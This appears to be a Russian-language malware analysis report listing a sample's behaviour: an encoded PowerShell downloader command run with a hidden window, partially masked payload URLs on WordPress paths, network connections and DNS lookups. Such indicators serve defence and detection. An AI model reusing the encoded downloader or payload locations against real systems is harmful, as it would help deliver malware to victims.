Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAF8AOAAyADYANgA9ACgAJwBKADUANwAnACsAJwAxAF8AOQAnACkAOwAkAFIANABfAF8AMgAxAF8ANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABrAF8AMAA4ADYAOAA5ADEAPQAoACcAaAB0AH...
- 'sh####mwebsites.com':80
- 'wr###otors.com':80
- 'fo#####woodworks.com':80
- 'fo#####woodworks.com':443
- http://sh####mwebsites.com/wp-includes/18/
- http://wr###otors.com/wp-includes/oK/
- http://fo#####woodworks.com/wordpress/EGw/
- 'fo#####woodworks.com':443
- DNS ASK sh####mwebsites.com
- DNS ASK se###sites.es
- DNS ASK wr###otors.com
- DNS ASK fo#####woodworks.com
- DNS ASK zi###im4u.co.il
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAF8AOAAyADYANgA9ACgAJwBKADUANwAnACsAJwAxAF8AOQAnACkAOwAkAFIANABfAF8AMgAxAF8ANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABrAF8AMAA4ADYAOAA5ADEAPQAoACcAaAB0AH...' (со скрытым окном)